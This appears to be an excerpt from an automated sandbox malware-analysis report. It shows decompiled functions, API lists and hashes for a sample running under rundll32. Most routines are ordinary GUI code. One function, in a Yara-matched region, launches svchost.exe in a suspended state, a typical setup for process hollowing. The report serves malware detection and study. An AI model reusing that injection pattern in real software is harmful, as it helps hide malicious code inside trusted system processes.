                          0x027f50b8
                          0x027f50c2
                          0x027f50e7
                          0x027f50ef
                          0x027f510f
                          0x027f5114
                          0x027f511f
                          0x027f512a
                          0x027f5134
                          0x027f5135
                          0x027f5136
                          0x027f5137
                          0x027f5138
                          0x027f5139
                          0x027f5143
                          0x027f5145
                          0x027f514d
                          0x027f514e
                          0x027f514e
                          0x027f5153
                          0x027f5153
                          0x027f50c4
                          0x027f50c9
                          0x027f50d6
                          0x027f50e3
                          0x027f50e3
                          0x027f515d

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 027F5104
                          • GetSystemMetrics.USER32(00000000), ref: 027F5119
                          • GetSystemMetrics.USER32(00000001), ref: 027F5124
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 027F514E
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfoW
                          • API String ID: 2545840971-2774842281
                          • Opcode ID: fd33463561f08eb04834a25abbfad5086ec1f2c5ed164be0ed03ad33e0dfc4a7
                          • Instruction ID: 2d97c991682431899fc5a4438d5488f96a06f5ac715916a2d06f2263e7d71d03
                          • Opcode Fuzzy Hash: fd33463561f08eb04834a25abbfad5086ec1f2c5ed164be0ed03ad33e0dfc4a7
                          • Instruction Fuzzy Hash: 8511E639A44304AFD760DF68DC487A7B7E9EF05714F814929EE5997780D370B440CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FB8F0 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E027FB8F0(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				int _t37;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t16 = __eax;
				_t49 = _t51;
				_t52 = _t51 + 0xfffffbf0;
				_v8 = __edx;
				_t46 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E027F9078(_v8, 0xff,  &_v1044);
					_t37 = _t16;
					if(_t37 == 0) {
						goto L4;
					} else {
						_v12 = GetDC(0);
						_v16 = CreateCompatibleDC(_v12);
						_v20 = SelectObject(_v16, _t46);
						_push(_t49);
						_push(0x27fb99f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t52;
						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(0x27fb9a6);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						return ReleaseDC(0, _v12);
					}
				}
			}















                          0x027fb8f0
                          0x027fb8f1
                          0x027fb8f3
                          0x027fb8fb
                          0x027fb8fe
                          0x027fb902
                          0x027fb9a6
                          0x027fb9ab
                          0x027fb913
                          0x027fb921
                          0x027fb926
                          0x027fb92a
                          0x00000000
                          0x027fb92c
                          0x027fb933
                          0x027fb93f
                          0x027fb94c
                          0x027fb951
                          0x027fb952
                          0x027fb957
                          0x027fb95a
                          0x027fb96b
                          0x027fb972
                          0x027fb975
                          0x027fb978
                          0x027fb985
                          0x027fb98e
                          0x027fb99e
                          0x027fb99e
                          0x027fb92a

                          APIs
                            • Part of subcall function 027F9078: GetObjectA.GDI32(?,00000004), ref: 027F908F
                            • Part of subcall function 027F9078: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 027F90B2
                          • GetDC.USER32(00000000), ref: 027FB92E
                          • CreateCompatibleDC.GDI32(?), ref: 027FB93A
                          • SelectObject.GDI32(?), ref: 027FB947
                          • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,027FB99F,?,?,?,?,00000000), ref: 027FB96B
                          • SelectObject.GDI32(?,?), ref: 027FB985
                          • DeleteDC.GDI32(?), ref: 027FB98E
                          • ReleaseDC.USER32(00000000,?), ref: 027FB999
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                          • String ID:
                          • API String ID: 4046155103-0
                          • Opcode ID: a26e56a694d4a40ff68ad9f63c44ca4582ba2e6a3a51af772618d7a9fd8d963d
                          • Instruction ID: 7e1af5a8c0beec6d81401b87b2837827e5a148ecd8537895a19745dff69a1a30
                          • Opcode Fuzzy Hash: a26e56a694d4a40ff68ad9f63c44ca4582ba2e6a3a51af772618d7a9fd8d963d
                          • Instruction Fuzzy Hash: 65116DB6E04209ABDB51EFE8DC84EAEB7BDEF48704F4044A5AA18E7240D77199408B65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281C130 Relevance: 10.6, APIs: 7, Instructions: 63threadwindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E0281C130(intOrPtr __eax, void* __ecx, short __edx) {
				intOrPtr _v8;
				short _v10;
				struct tagPOINT _v18;
				struct HWND__* _v24;
				long _v28;
				intOrPtr _t29;
				long _t38;
				void* _t50;

				_t50 = __ecx;
				_v10 = __edx;
				_v8 = __eax;
				if(_v10 ==  *((intOrPtr*)(_v8 + 0x44))) {
					L6:
					_t29 = _v8;
					 *((intOrPtr*)(_t29 + 0x48)) =  *((intOrPtr*)(_t29 + 0x48)) + 1;
					return _t29;
				}
				 *((short*)(_v8 + 0x44)) = _v10;
				if(_v10 != 0) {
					L5:
					SetCursor(E0281C0D4(_v8, _v10));
					goto L6;
				}
				GetCursorPos( &_v18);
				_push(_v18.y);
				_v24 = WindowFromPoint(_v18);
				if(_v24 == 0) {
					goto L5;
				}
				_t38 = GetWindowThreadProcessId(_v24, 0);
				if(_t38 != GetCurrentThreadId()) {
					goto L5;
				}
				_v28 = SendMessageA(_v24, 0x84, 0, E027D6FA4( &_v18, _t50));
				return SendMessageA(_v24, 0x20, _v24, E027D6EF4(_v28, 0x200));
			}











                          0x0281c130
                          0x0281c137
                          0x0281c13b
                          0x0281c149
                          0x0281c1e1
                          0x0281c1e1
                          0x0281c1e4
                          0x00000000
                          0x0281c1e4
                          0x0281c156
                          0x0281c15f
                          0x0281c1cf
                          0x0281c1dc
                          0x00000000
                          0x0281c1dc
                          0x0281c165
                          0x0281c16a
                          0x0281c175
                          0x0281c17c
                          0x00000000
                          0x00000000
                          0x0281c184
                          0x0281c192
                          0x00000000
                          0x00000000
                          0x0281c1ad
                          0x00000000

                          APIs
                          • GetCursorPos.USER32(?), ref: 0281C165
                          • WindowFromPoint.USER32(?,?,?), ref: 0281C170
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0281C184
                          • GetCurrentThreadId.KERNEL32 ref: 0281C18B
                          • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0281C1A8
                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 0281C1C8
                          • SetCursor.USER32(00000000), ref: 0281C1DC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                          • String ID:
                          • API String ID: 1770779139-0
                          • Opcode ID: 35b66f4ac1beeb866154e5d90ae45f5087497cab6e02366f9d3a133472dad1b8
                          • Instruction ID: 7f3d1a991febcce2cea210d60a45c913f5c5001e68bc571498b878e526b4a69b
                          • Opcode Fuzzy Hash: 35b66f4ac1beeb866154e5d90ae45f5087497cab6e02366f9d3a133472dad1b8
                          • Instruction Fuzzy Hash: 7D21DD79E40209EBDF01EBE5D945AEEB3BEAF08704F504051A604FB291E7719E40CBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DBAFC Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027DBAFC(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E027DB974(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x286465c; // 0x286504c
				if( *_t14 == 0) {
					_t16 =  *0x28643a0; // 0x27d72c4
					_t9 = _t16 + 4; // 0xffec
					_t18 =  *0x2865668; // 0x27d0000
					LoadStringA(E027D5568(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x2864400; // 0x286521c
				E027D28E4(E027D2A70(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E027D8B88( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x27dbbc0, 2,  &_v1092, 0);
			}












                          0x027dbb0b
                          0x027dbb10
                          0x027dbb18
                          0x027dbb7f
                          0x027dbb84
                          0x027dbb88
                          0x027dbb93
                          0x00000000
                          0x027dbba9
                          0x027dbb1a
                          0x027dbb24
                          0x027dbb33
                          0x027dbb43
                          0x027dbb56
                          0x00000000

                          APIs
                            • Part of subcall function 027DB974: VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DB991
                            • Part of subcall function 027DB974: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DB9B5
                            • Part of subcall function 027DB974: GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DB9D0
                            • Part of subcall function 027DB974: LoadStringA.USER32(00000000,0000FFEB,?,00000100), ref: 027DBA66
                          • CharToOemA.USER32(?,?), ref: 027DBB33
                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,0281E749), ref: 027DBB50
                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,0281E749), ref: 027DBB56
                          • GetStdHandle.KERNEL32(000000F4,027DBBC0,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,0281E749), ref: 027DBB6B
                          • WriteFile.KERNEL32(00000000,000000F4,027DBBC0,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,0281E749), ref: 027DBB71
                          • LoadStringA.USER32(00000000,0000FFEC,?,00000040), ref: 027DBB93
                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 027DBBA9
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                          • String ID:
                          • API String ID: 185507032-0
                          • Opcode ID: 31ee9a039614341e706ac34324cabf9b62f432bd00a0a32ba353ebccfb539564
                          • Instruction ID: ebf35828b1f2cf58cd0a0bb7d3daa4abdcda1c74f13ae490743ad168ba13f95e
                          • Opcode Fuzzy Hash: 31ee9a039614341e706ac34324cabf9b62f432bd00a0a32ba353ebccfb539564
                          • Instruction Fuzzy Hash: 0D1170B5544204BED302FBA4EC49F9F77FEAB45700F804915B695D60E2DB75D904CB22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2C40 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47processstringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D2C40(void** _a4, intOrPtr* _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				char _v348;

				E042D14A0( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
				lstrcatA( &_v348, "\\System32\\svchost.exe");
				if(CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20) != 0) {
					 *_a4 = _v20.hProcess;
					 *_a8 = _v20.hThread;
					return 1;
				}
				return 0;
			}






                          0x042d2c51
                          0x042d2c59
                          0x042d2c71
                          0x042d2c83
                          0x042d2cb1
                          0x042d2cbd
                          0x042d2cc5
                          0x00000000
                          0x042d2cc7
                          0x00000000

                          APIs
                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 042D2C71
                          • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 042D2C83
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 042D2CA9
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEnvironmentProcessVariablelstrcat
                          • String ID: D$SystemRoot$\System32\svchost.exe
                          • API String ID: 3510847443-1175289849
                          • Opcode ID: 7666cfcaf8ae752f94de9e9069de0e85e01071526a1b919cb755aee6a9a52cea
                          • Instruction ID: 41aea1c3ee63f65ec5ee06c77abb689cb8ea5bd17718822650c1257206e42b9b
                          • Opcode Fuzzy Hash: 7666cfcaf8ae752f94de9e9069de0e85e01071526a1b919cb755aee6a9a52cea
                          • Instruction Fuzzy Hash: 65015E75B50309ABE710DFD4DC4AFE97378EB84B05F004154BB09AE2C0EAB46A488B64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02855630 Relevance: 9.5, APIs: 6, Instructions: 477COMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E02855630(intOrPtr __eax, struct HDC__* __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v21;
				struct tagRECT _v37;
				struct tagRECT _v53;
				void* __edi;
				void* __ebp;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr _t459;
				intOrPtr _t489;
				signed int _t491;
				intOrPtr _t498;
				struct HDC__* _t531;
				intOrPtr _t535;
				void* _t537;
				void* _t539;
				intOrPtr _t540;

				_t537 = _t539;
				_t540 = _t539 + 0xffffffcc;
				_t531 = __edx;
				_v8 = __eax;
				_t270 = _v8;
				_t489 =  *0x2855d18; // 0x0
				_t542 = _t489 -  *((intOrPtr*)(_t270 + 0x208));
				if(_t489 ==  *((intOrPtr*)(_t270 + 0x208))) {
					return _t270;
				} else {
					_t272 =  *((intOrPtr*)(_v8 + 0x20a));
					_t491 =  *((intOrPtr*)(_v8 + 0x209));
					_t464 = _t272 + _t491 + _t272 + _t272 + _t491 + _t491 * 2 - 3;
					_v21 = _t272 + _t491 + _t272 + _t272 + _t491 + _t491 * 2 - 3;
					_t459 =  *((intOrPtr*)(E02855D3C(_v8, _t542) + 0x40));
					_t535 =  *((intOrPtr*)(E02855D3C(_v8, _t542) + 0x40));
					if(0 > 0xb) {
						L9:
						_v16 =  *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40));
						_v20 =  *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40));
						_t459 =  *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40));
						_t535 =  *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40));
					} else {
						switch( *((intOrPtr*)(0 +  &M028556A3))) {
							case 0:
								_v16 = E028423E4( *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40)), 0x13, __fp0);
								_v20 = E028424A4( *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40)), 0xffffffce, __fp0);
								goto L10;
							case 1:
								goto L9;
							case 2:
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								_v16 = __eax;
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E028423E4(__eax, 0x13, __fp0);
								_v20 = __eax;
								goto L10;
							case 3:
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E028423E4(__eax, 0x13, __fp0);
								__edx = 0xffffffe2;
								__eax = E028424A4(__eax, 0xffffffe2, __fp0);
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E028424A4(__eax, 0xffffffce, __fp0);
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								_v16 = __eax;
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffe7;
								__eax = E028424A4(__eax, 0xffffffe7, __fp0);
								_v20 = __eax;
								goto L10;
							case 4:
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E028423E4(__eax, 0x13, __fp0);
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E028424A4(__eax, 0xffffffce, __fp0);
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								_v16 = __eax;
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E028423E4(__eax, 0x13, __fp0);
								_v20 = __eax;
								goto L10;
							case 5:
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E028424A4(__eax, 0xffffffce, __fp0);
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E028423E4(__eax, 0x13, __fp0);
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								_v16 = __eax;
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E028424A4(__eax, 0xffffffce, __fp0);
								_v20 = __eax;
								goto L10;
							case 6:
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E028424A4(__eax, 0xffffffce, __fp0);
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E028423E4(__eax, 0x13, __fp0);
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								_v16 = __eax;
								__eax = _v8;
								__eax = E02855D3C(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E028423E4(__eax, 0x13, __fp0);
								_v20 = __eax;
								goto L10;
						}
					}
					L10:
					GetClientRect(E02833F7C(_v8),  &_v37);
					GetWindowRect(E02833F7C(_v8),  &_v53);
					MapWindowPoints(0, E02833F7C(_v8),  &_v53, 2);
					OffsetRect( &_v37,  ~(_v53.left),  ~(_v53.top));
					ExcludeClipRect(_t531, _v37, _v37.top, _v37.right, _v37.bottom);
					OffsetRect( &_v53,  ~(_v53.left),  ~(_v53.top));
					_v12 = E027F84EC( *((intOrPtr*)(_v8 + 0x21c)));
					_push(_t537);
					_push(0x2855d07);
					_push( *[fs:eax]);
					 *[fs:eax] = _t540;
					E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _t531);
					E027F7AD0( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, 1, _t531, _t537);
					if(( *(_v8 + 0x208) & 0x00000002) != 0 || ( *(_v8 + 0x208) & 0x00000001) != 0 && ( *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 ||  *((char*)(_v8 + 0x20a)) == 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0)) {
						E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _v16, _t531, _t537);
						if(( *(_v8 + 0x208) & 0x00000002) != 0) {
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.right);
							_t464 = _v53.top;
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.left - 1);
						}
						if(( *(_v8 + 0x208) & 0x00000001) != 0) {
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.left);
							_t464 = _v53.bottom;
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom, _v53.left);
						}
					}
					if(( *(_v8 + 0x208) & 0x00000002) != 0 || ( *(_v8 + 0x208) & 0x00000001) != 0 &&  *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0) {
						E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _t459, _t531, _t537);
						if(( *(_v8 + 0x208) & 0x00000002) != 0) {
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.right - 1);
							_t464 = _v53.top + 1;
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.left + 1);
						}
						if(( *(_v8 + 0x208) & 0x00000001) != 0) {
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.left + 1);
							_t464 = _v53.bottom - 2;
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.left + 1);
						}
					}
					if(( *(_v8 + 0x208) & 0x00000008) != 0 || ( *(_v8 + 0x208) & 0x00000004) != 0 && ( *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 ||  *((char*)(_v8 + 0x20a)) == 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0)) {
						E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _v20, _t531, _t537);
						if(( *(_v8 + 0x208) & 0x00000004) != 0) {
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.right - 1);
							_t464 = _v53.bottom - 1;
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.right - 1);
						}
						if(( *(_v8 + 0x208) & 0x00000008) != 0) {
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.right - 1);
							_t464 = _v53.bottom - 1;
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.left - 1);
						}
					}
					if(( *(_v8 + 0x208) & 0x00000008) != 0 || ( *(_v8 + 0x208) & 0x00000004) != 0 &&  *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0) {
						E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _t535, _t531, _t537);
						if(( *(_v8 + 0x208) & 0x00000004) != 0) {
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.right - 2);
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.right - 2);
						}
						if(( *(_v8 + 0x208) & 0x00000008) != 0) {
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.right - 2);
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.left);
						}
					}
					_pop(_t498);
					 *[fs:eax] = _t498;
					_push(0x2855d0e);
					return E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _v12);
				}
			}























                          0x02855631
                          0x02855633
                          0x02855639
                          0x0285563b
                          0x0285563e
                          0x02855641
                          0x02855647
                          0x0285564d
                          0x02855d14
                          0x02855653
                          0x02855656
                          0x02855661
                          0x02855672
                          0x02855675
                          0x02855680
                          0x0285568b
                          0x02855696
                          0x028558d0
                          0x028558db
                          0x028558e9
                          0x028558f4
                          0x028558ff
                          0x0285569c
                          0x0285569c
                          0x00000000
                          0x028556e8
                          0x02855700
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x02855708
                          0x0285570b
                          0x02855710
                          0x02855713
                          0x0285571d
                          0x02855720
                          0x02855723
                          0x02855728
                          0x0285572b
                          0x02855730
                          0x02855735
                          0x00000000
                          0x00000000
                          0x0285573d
                          0x02855740
                          0x02855745
                          0x02855748
                          0x0285574d
                          0x02855752
                          0x02855757
                          0x0285575e
                          0x02855761
                          0x02855766
                          0x02855769
                          0x0285576e
                          0x02855775
                          0x02855778
                          0x0285577d
                          0x02855780
                          0x0285578a
                          0x0285578d
                          0x02855790
                          0x02855795
                          0x02855798
                          0x0285579d
                          0x028557a2
                          0x00000000
                          0x00000000
                          0x028557aa
                          0x028557ad
                          0x028557b2
                          0x028557b5
                          0x028557ba
                          0x028557c1
                          0x028557c4
                          0x028557c9
                          0x028557cc
                          0x028557d1
                          0x028557d8
                          0x028557db
                          0x028557e0
                          0x028557e3
                          0x028557ed
                          0x028557f0
                          0x028557f3
                          0x028557f8
                          0x028557fb
                          0x02855800
                          0x02855805
                          0x00000000
                          0x00000000
                          0x0285580d
                          0x02855810
                          0x02855815
                          0x02855818
                          0x0285581d
                          0x02855824
                          0x02855827
                          0x0285582c
                          0x0285582f
                          0x02855834
                          0x0285583b
                          0x0285583e
                          0x02855843
                          0x02855846
                          0x02855850
                          0x02855853
                          0x02855856
                          0x0285585b
                          0x0285585e
                          0x02855863
                          0x02855868
                          0x00000000
                          0x00000000
                          0x02855870
                          0x02855873
                          0x02855878
                          0x0285587b
                          0x02855880
                          0x02855887
                          0x0285588a
                          0x0285588f
                          0x02855892
                          0x02855897
                          0x0285589e
                          0x028558a1
                          0x028558a6
                          0x028558a9
                          0x028558b3
                          0x028558b6
                          0x028558b9
                          0x028558be
                          0x028558c1
                          0x028558c6
                          0x028558cb
                          0x00000000
                          0x00000000
                          0x0285569c
                          0x02855902
                          0x0285590f
                          0x02855921
                          0x02855937
                          0x0285594c
                          0x02855962
                          0x02855977
                          0x0285598a
                          0x0285598f
                          0x02855990
                          0x02855995
                          0x02855998
                          0x028559a6
                          0x028559bc
                          0x028559cb
                          0x02855a18
                          0x02855a27
                          0x02855a38
                          0x02855a4a
                          0x02855a4d
                          0x02855a4d
                          0x02855a5c
                          0x02855a6d
                          0x02855a7b
                          0x02855a81
                          0x02855a81
                          0x02855a5c
                          0x02855a90
                          0x02855ad4
                          0x02855ae3
                          0x02855af6
                          0x02855afe
                          0x02855b0c
                          0x02855b0c
                          0x02855b1b
                          0x02855b2e
                          0x02855b36
                          0x02855b46
                          0x02855b46
                          0x02855b1b
                          0x02855b55
                          0x02855ba6
                          0x02855bb5
                          0x02855bc7
                          0x02855bcf
                          0x02855bdd
                          0x02855bdd
                          0x02855bec
                          0x02855bff
                          0x02855c07
                          0x02855c15
                          0x02855c15
                          0x02855bec
                          0x02855c24
                          0x02855c68
                          0x02855c77
                          0x02855c8c
                          0x02855ca6
                          0x02855ca6
                          0x02855cb5
                          0x02855ccc
                          0x02855ce3
                          0x02855ce3
                          0x02855cb5
                          0x02855cea
